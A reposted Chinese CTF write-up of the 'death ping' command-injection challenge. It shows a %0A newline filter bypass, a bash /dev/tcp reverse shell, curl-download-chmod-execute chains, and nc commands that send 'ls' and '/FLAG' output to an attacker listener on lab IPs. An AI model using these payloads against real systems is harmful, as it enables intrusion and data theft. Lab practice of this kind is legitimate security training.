从0到1:CTFer成长之路——死亡 Ping 命令

news2024/11/19 20:39:03

死亡 ping 命令

绕过探测

  • 手动尝试

    image-20231026111651824

    image-20231026111706228

    image-20231026111721198

  • 脚本生成转义后的字符,后面拼接命令

    import urllib.parse
    
    with open(r"C:\Users\LEGION\Desktop\RCE.txt", "w", encoding="utf-8") as f:
      for i in range(0, 255):
      	  encoded_str = urllib.parse.quote(chr(i)+"whoami")
      	  f.write(encoded_str + "\n")
    

    在这里插入图片描述

  • bp 爆破

    image-20231026160017488

  • 出现中文乱码

    image-20231026160821417

  • 设置编码

    image-20231026160849659

    image-20231026160537144

  • 爆破

    最终发现转义后的 %0A 拼接时未被过滤

    image-20231026161125093

漏洞发现

  • 发送到 Repeater 模块中查看,执行成功但并没有回显

    image-20231026161457031

  • 尝试 kali 开启 nc 监听,反弹 shell

    bash -i >& /dev/tcp/10.4.7.138/8888 0>&1
    

    image-20231026162156157

  • 命令中包含过滤字符

  • 开启另一个靶机,将命令写入 shell 文件尝试传入

    bash -i >& /dev/tcp/10.4.7.146/8888 0>&1
    
  • 开启 80 端口(docker 所在的靶机 80 端口被占用)

  • wget 下载失败(可能 docker 中未安装 wget)

    image-20231026200703266

  • curl 下载成功

    ip=%0Acurl 10.4.7.146/shell> /tmp/shell
    

    image-20231026200644416

  • 赋权

    ip=%0Achmod 777 /tmp/shell
    

    image-20231026200716932

  • 10.4.7.146 开启监听

    image-20231026200814244

  • 运行,反弹失败

    ip=%0A /tmp/shell
    

    image-20231026200834519

  • 查找资料说此 docker 未安装 bash、python 等,所以无法反弹 shell

flag 获取

  • 尝试直接回显

    ls | nc 10.4.7.146 8888
    # 将 ls 查看的命令输出回显到 kali
    

    因为 | 会被过滤,所以使用同样的方法将命令写到 kali 的文件中,上传到靶机执行

  • 编辑文件

    image-20231026200916698

  • 上传

    ip=%0Acurl 10.4.7.146/ls > /tmp/ls
    

    image-20231026200947835

  • 赋权

    ip=%0Achmod 777 /tmp/ls
    
  • 执行

    ip=%0A/tmp/ls
    

    显示成功

    image-20231026201019390

    查看反弹的 kali

    成功反弹回 ls 的执行结果

    image-20231026201144696

  • 接下来就是一个个命令上传,浏览附录

    image-20231026201502881

    bp 中依次发送包

    ip=%0Acurl 10.4.7.146/ls2 > /tmp/ls2
    
    ip=%0Achmod 777 /tmp/ls2
    
    ip=%0A/tmp/ls2
    

    image-20231026201726723

  • 最终发现 flag 在根下

    查看 flag

    上传查看 flag 的脚本

    cat /FLAG | nc 10.4.7.146 8888
    

    image-20231026201925518

    ip=%0Acurl 10.4.7.146/cat > /tmp/cat
    
    ip=%0Achmod 777 /tmp/cat
    
    ip=%0A/tmp/cat
    

    image-20231026202046104

    image-20231026202056904

  • 成功拿到 falg

    n1book{6fa82809179d7f19c67259aa285a7729}
    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1138068.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

短篇小说 《镜花水月》

最近脑中不知道为什么,一直构想着这样一个故事,心血来潮,还是想把它直接付诸实践。如果大家有些兴趣可以读一读,欢迎评论留言,发表自己的看法,大家也可以给一些建议或者自己设计一些比较好的情节或者点&…

leetcode第80题:删除有序数组中的重复项 II

题目描述 给你一个有序数组 nums ,请你 原地 删除重复出现的元素,使得出现次数超过两次的元素只出现两次 ,返回删除后数组的新长度。 不要使用额外的数组空间,你必须在 原地 修改输入数组 并在使用 O(1) 额外空间的条件下完成。 …

一种实用的边的存储结构--链式前向星

文章目录 前言前向星定义存储结构优缺点 链式前向星边的定义边的插入边的查找运行示例 总结 前言 我们对于图的存储方式常用的有邻接矩阵(适用于稠密图),对于边的查询效率较低,也有邻接表,对于边的查询效率高&#xf…

警报:Citrix和VMware漏洞的PoC利用代码已发布

导语 近日,虚拟化服务提供商VMware向客户发出警报,称其Aria Operations for Logs中的一个已修补安全漏洞的PoC利用代码已经发布。这个高危漏洞(CVE-2023-34051)是一种绕过身份验证的情况,可能导致远程代码执行。本文将…

【备考网络工程师】如何备考2023年网络工程师之上午常见考点篇(上)

目录 写在前面涉及知识点一、香农定理与奈奎斯特定理问题1.1 香农定理1.2 尼奎斯特定理 二、E1与T1问题三、数据传输延迟问题3.1 对于电缆3.2 对于卫星 四、数字化技术PCM计算问题五、CSMA/CD以太帧最小帧长计算问题六、CSMA/CD考点汇总七、CSMA/CA考点汇总八、各协议注意事项总…

初步认识 Web Components 并实现一个按钮

目录 1.Web Components 基本概念 1.1 三个场景 1.2 是什么 2.使用 Custom Elements 实现一个按钮 2.1 概念介绍 2.1.1 Shadow DOM 2.1.2 Element.attachShadow() 2.1.3 在组件中 使用 Shadow DOM 基本步骤 2.1.4 attributeChangedCallback 2.1.5 get observedAttribu…

绝对路径与相对路径

目录 一、绝对路径 二、相对路径 三、举例 一、绝对路径 绝对路径是指从根目录开始的完整路径,包括所有父目录的路径,直到目标文件或者目录 所在的位置。 全文件名全路径文件名绝对路经完整的路径 例如:在windows系统中,绝对路径通常以…

nuxt脚手架

nuxt(vue)和next(react)都是服务端渲染的 安装 - NuxtJS | Nuxt.js 中文网 首先要安装 create-nuxt-app: npm install create-nuxt-app -g 然后:npx create-nuxt-app master 建议在cmd中操作,可以单选和多选 然后就各种单选和多选,多选按…

实用篇-服务拆分及远程调用

一、服务拆分 服务拆分(也叫项目拆分) 注意事项: 不同的微服务,不要重复开发相同的业务要求微服务之间数据独立,不要访问其他微服务的数据库微服务可用将自己的业务暴漏为接口,供其他服务调用 1. Cloud-Demo拆分 首先有一个已…

项目管理之如何有效定义项目目标

项目目标管理是项目管理中非常重要的一个环节,它可以帮助项目团队明确目标,制定合理可行的计划,确保项目顺利实施并取得成功。在定义项目目标时,需要遵循SMART原则,确保目标具体、明确、可衡量、可实现、相关且有时间和…

【Reticulate Micro】申请1000万美元纳斯达克IPO上市

来源:猛兽财经 作者:猛兽财经 猛兽财经获悉,总部位于美国的【Reticulate Micro】近期已向美国证券交易委员会(SEC)提交招股书,申请在纳斯达克IPO上市,股票代码为(RMIC) ,Reticulate…

TensorFlow学习:使用官方模型和自己的训练数据进行图片分类

前言 教程来源:清华大佬重讲机器视觉!TensorFlowOpencv:深度学习机器视觉图像处理实战教程,物体检测/缺陷检测/图像识别 注: 这个教程与官网教程有些区别,教程里的api比较旧,核心思想是没有变…

C++——类和对象(了解面向过程和面向对象、初步认识类和对象、类大小的计算、this指针)

类和对象 文章目录 类和对象1. 面向过程和面向对象1.1 面向过程1.2 面向对象 2. 类和对象2.1 什么是类2.2 类的定义2.2.1 声明和定义类中函数的两种方法2.2.2 声明成员变量的小细节 2.3 访问限定符2.3.1 访问限定符的作用范围2.3.2 class类和struct类的默认访问权限 2.4 类的实…

手部关键点检测5:C++实现手部关键点检测(手部姿势估计)含源码 可实时检测

手部关键点检测5:C实现手部关键点检测(手部姿势估计)含源码 可实时检测 目录 手部关键点检测4:C实现手部关键点检测(手部姿势估计)含源码 可实时检测 1.项目介绍 2.手部关键点检测(手部姿势估计)方法 (1)Top-Down(自上而下)方法 (2)Bottom-Up(自下…

mac vscode 使用 clangd

C 的智能提示 IntelliSense 非常不准,我们可以使用 clangd clangd 缺点就是配置繁琐,优点就是跳转和提示代码精准 开启 clangd 之后会提示你关闭 IntelliSense 1、安装插件 clangd 搜索第一个下载多的就是 2、配置 clangd 可执行程序路径 clangd 插…

【虹科干货】谈谈Redis Enterprise的实时搜索

我们都知道,用户在使用应用程序时候,对于速度有着越来越高的要求,真可谓是“一秒也等不及”。而开发团队又该怎样来满足这种对于实时性的期望呢? 文章速览: Redis Enterprise实时搜索的应用场景利用索引为开发人员带…

特殊类设计[下] --- 单例模式

文章目录 5.只能创建一个对象的类5.1设计模式[2.5 万字详解:23 种设计模式](https://zhuanlan.zhihu.com/p/433152245)5.2单例模式1.饿汉模式1.懒汉模式 6.饿汉模式7.懒汉模式7.1饿汉模式优缺点:7.2懒汉模式1.线程安全问题2.单例对象的析构问题 8.整体代码9.C11后可…

C++项目——云备份-⑤-数据管理模块的设计与实现

文章目录 专栏导读1.要管理的数据有哪些2.如何管理数据3.数据信息结构体设计与实现4.数据管理类设计5.数据管理类实现6.数据管理模块整理 专栏导读 🌸作者简介:花想云 ,在读本科生一枚,C/C领域新星创作者,新星计划导师…

打破尺寸记录!荷兰QuTech研发16量子点阵列新技术

承载16个量子点交叉条阵列的量子芯片,可无缝集成到棋盘图案(图片来源:网络) 由荷兰代尔夫特理工大学(TU Delft)和荷兰应用科学研究组织(TNO)组建的荷兰量子计算研究中心QuTech的研究人员开发了一种用相对较少的控制线来控制大量量…

【QT】Qt控件不显示图标

问题描述 本人在跟着B站视频学习QT时,遇到了一件十分悲惨的事情,一模一样的步骤,我的图标却不能显示。 于是我上网查询一下解决方案,第一种,亲测没用;第二种亲测可以。 解决方法一 1、构建 -> 清理项目…